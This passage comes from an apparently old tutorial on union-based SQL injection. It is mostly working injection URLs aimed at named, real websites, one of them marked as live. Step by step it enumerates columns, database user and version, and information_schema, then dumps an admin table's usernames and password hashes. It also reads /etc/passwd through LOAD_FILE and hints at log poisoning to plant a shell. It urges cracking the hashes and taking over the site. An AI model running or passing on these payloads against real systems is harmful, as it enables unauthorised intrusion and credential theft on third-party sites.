The UNION operator is Nothing more than a way to ask for more than 1 query at the same time. In essence this is the command after the first command. The use of ALL with UNION allows the return of ALL records matching if this is not used then the UNION will only return distinct results meaning it does not return duplicate values if any exist. we shall use "UNION ALL". Now when using UNION operators you must also use the SELECT statement because we are selecting data from the database. This being said we should now be up to http://www.itmaasia.com/news.php?id=1 UNION ALL SELECT --

To make this work to our benefit first we will want to only display our results. Meaning we do not wantto see what is on the page with ID =1. So we need only select a valid result that is not included in the database. Like for instance -1 or again 9999 which in this case could be used in LARGE databases or you could also use NULL. Now NULL normally shouldnt exist so lets use that. http://www.itmaasia.com/news.php?id=NULL UNION ALL SELECT --

Now this will only return our data as long as null is not a result Granted this is not a complete injection its only a projection of where we are at. Next is where our hard work pays off remember that Magical column number we found this is where we use it to use the union all select we will need to specify our amount of columns. If the original query was selecting 4 columns then it would be easier LOL BUT, this is where hackbar comes in handy again. With the URL loaded in hackbar you can use the sql icon to add a union select statement. then "rewrite" if necessary to look something like this http://www.itmaasia.com/news.php?id=NULL UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

Now With this command we get our FIRST glance at what the site is pulling from the database. We should see two things on this page HOME >> Exhibitors List >> 311

Now what this tells us is that its pulling data from the database and displaying it in COLUMNS 3 and 11. That means for us to "SEE" the output of our query we are gonna have to use one of those columns to display it back to us. Column 3 would be probably the title of the news item and 11 would more thanlikely be the info that goes along with it for argument sake anyway. So taking this into consideration lets do some explaining. The column numbers are not actually numbers at all the 1,2,3,4 are more or

less place holders. The , is the real column so dont forget your commas thats what the sql is looking for,whats between them dont really matter. Some times in certain injection you may get an error with data type mismatching There are ways around that that may. By using the cast() function you could change the fact that column 2 only allows to display a string so you could use the CAST(3 as nvarchar) function instead of the 3 in your injection and it would allow it to be displayed you can also use '3' in place of the 3 to accomplish the same thing.

To prove a point I will touch on the CHAR() function now The Char() function interprets each value as an integer and returns a string based on the given characters by the code values of those integers. Lets go back to hackbar for an example highlight the number 3 in your injection and select the sql icon -> MYSQL ->MYSQL CHAR() and the injection Changes to this http://www.itmaasia.com/news.php?id=NULL UNION ALL SELECT 1,2,CHAR(51),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

now to us it has not really changed. now try using this instead http://www.itmaasia.com/news.php?id=NULL UNION ALL SELECT 1,2,CHAR(83, 89, 78),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

now notice anything different? :-) This can come in handy later. Anyway.

0x06

Now that we have achieved our goal so far we will need to complete a few more steps to officially "HACK" this site. Now we have to get some data from the database. We need to gather information from the server about itself, this can easily be accomplished with a few basic questions. The things we need to know are the user(), version(), and database(). we can do it a few different ways. http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

This displays citme_wanhu@localhost which is the user @localhost we could also accomplish it if we put it in the 11 column http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,user(),4,5,6,7,8,9,10,user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

I like the 11 column because it is displayed by itself so lets use that one from now on. http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

we could change user() with version() and database() and do it that way or we could use our friend concat() This allows you to combine to requests into the same column. http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,concat(user(),version(),database()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

This displays citme_wanhu@localhost5.1.33-communityexhibition now to me thats jumbled so lets addsome "FLAIR" to our injection through the usage of HEX values. concat(user(),0x3a,database(),0x3a,version()) this is basic the 0x3a is the hex value of the : character. tostart using hex in the sql statement you must preceded it with 0x so a little more advanced would be concat(user(),0x203a20,database(),0x203a20,version())

this will pad the : with spaces on each side because 0x20 is the hex value for the space character.

now here is a more advanced injection concat(0x7c20526573756c74733a20,0x56657273696f6e3a20,version(),0x3a20,0x44617461626

173653a20,database(),0x3a20,0x557365723a20,user(),0x207c,0x2020203a3a3a205073696265725f53796e203a3a3a)

try that and see what you get :-)

now depending on the version you have a new path to choose. it the version returns 4 something then the information_schema is not available so you will have to guess or use another method for the gettingthe tablenames. This will not be covered. Now if it returns version 5 we are relieved cause it makes it that much easier. INFORMATION_SCHEMA is a database that contains the information about the current users database. For instance it contains all the table_names and column_names that the current user has created. It also hold a lot of other data like privileges, triggers, character_sets etcetc. The schema also has different "chapters to it" information_schema.tables is all the table information likewise information_schema.columns holds the column information and so on. so the things we need to hack this site are the column names and the table names mainly. we are not going into multiple databases here this time. http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES--

would begin to display the tablenames contained in the database. to go through them you would use thelimit function like http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES limit 0,1--

changing the 0 to 1 lets you step through the table_names http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES limit 74,1--

would be the last table-name as anything further and it gives a blank page or errors. normally when youreach the lowercase table_names youve hit the user created tables. http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES limit 28,1--

starts the user created table list. we see some good ones in there tb_admin, user, members etcetc. lets just focus on the admin http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES limit 31,1--

now there are a few ways to do this next step also just this is what works for me 90% of the time. by changing the "chapter" in the info_schema you can see the column names just like the table names http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,concat(0x5461626c65204e616d653a20,table_name,0x2020436f6c756d6e204e616d653a20,column_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.columns limit 338,1--

notice i added the concat and fancied it up a bit and left in tablename that way i dont get lost cause as you can see there are hundreds of records to sort through at limit 338 here we begin in the tb_admin table admin_idusernamepassword

these are the columns we mainly care about. As you can see this user put a great deal amount of thinking into naming his columns here he is asking to get hacked to me. Before I move on I also want to explain the Group_concat() method It does much the same as a regular concat but if there is more than just one item like we have here then you would have to use limits to step through the individual tables and columns. Well im lazy and this takes time :-P enter group_concat() Using the same injection http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES—

we want to skip the whole limiting part and just see the entire list http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES—

as you see this will begin listing all the table names one after another BUT when it gets to the side it cuts off the rest what are we gonna do?? Using our new found knowledge of hex values we will insert anew line character news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,group_concat(table_name,0x0d0a),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES--

0x0d0a is the hex values for \r\n or so now we get the entire list in a nice readable fashion. Quick fast and to the point. Now there are timeswhere this will not work properly and you would have to use the limit technique so donÂ’t forget what you have learned.

0x07

Since we now know the amount of columns, table name, and column name the site is pretty much owned. with the use of this injection you will see your results http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,concat(0x61646d696e5f69643a20,admin_id,0x20757365726e616d653a20,username,0x2070617373776f72643a20, password),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM tb_admin --

0x08

Now just crack the password hash and thats it. the site is theoretically yours. ONLY ONE OTHER THING. finding the admin panel or login spots now that will have to be up to you there is no easy way to find these you would have to check all the known admin directories or just guess. This information will not be included. Sorry your on your own.

0x09

A short explanation of the load_file() function

ALSO A LiVE SITE SO BEWARE http://photos.surfline.com/view_image.php?pid=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,LOAD_FILE(0x2f6574632f706173737764),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--

this site looks much like any other injection except that we are using the load_file() function

LOAD_FILE(0x2f6574632f706173737764) this does what it looks like it loads a file from their server into the injection. you will more than likely have to use hex or char or something to use loadfile the onethere loads the /etc/passwd file from the site. there are also others that you could load for example the httpd.conf which is located at /etc/httpd/conf/httpd.conf or in hex 0x2f6574632f68747470642f636f6e662f68747470642e636f6e66 there are others that would help you tremendously such as poisoning logs to put up a shell or viewing the admin login page theres tons of things you can view essentially every file on the server accessible. But these methods are for a later lesson.

0x10

In conclusion i hope that we all learned something and i have shed some light on to the world of sql injections and hacking in general. I would like to thank Enigmgroup for their patience and expertise and i would like to thank the many users who visit the site religiously.

The author Psiber_Syn nor Enigmagroup can be held responsible with any and all information contained herein you must accept your own responsibilities this was just an example proof-of-concept

source

SQL Injection Cheat Sheets